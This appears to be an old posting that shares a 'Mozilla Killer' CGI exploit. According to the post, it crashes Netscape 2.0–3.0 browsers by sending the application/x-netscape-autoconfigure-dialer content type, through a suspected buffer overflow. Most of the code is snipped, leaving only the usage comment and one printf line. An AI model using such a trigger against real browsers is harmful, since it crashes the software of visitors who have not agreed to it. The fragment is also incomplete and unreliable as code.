Here's an exploit for a bug that I found in Netscape.  I believe there is a
buffer overflow here.  Netscape finally fixed this bug in 4.0 so I'm
distributing this now.

--cut--

/*

 Mozilla Killer

 Crashes all Windows Netscape browsers v2.0-3.0.  May work on the newer
 3.0 Macintosh versions.  Simply compile and make an href to this
 cgi and kab00m!

 

 */

#include 

[snip...]

  printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n");

[snip...]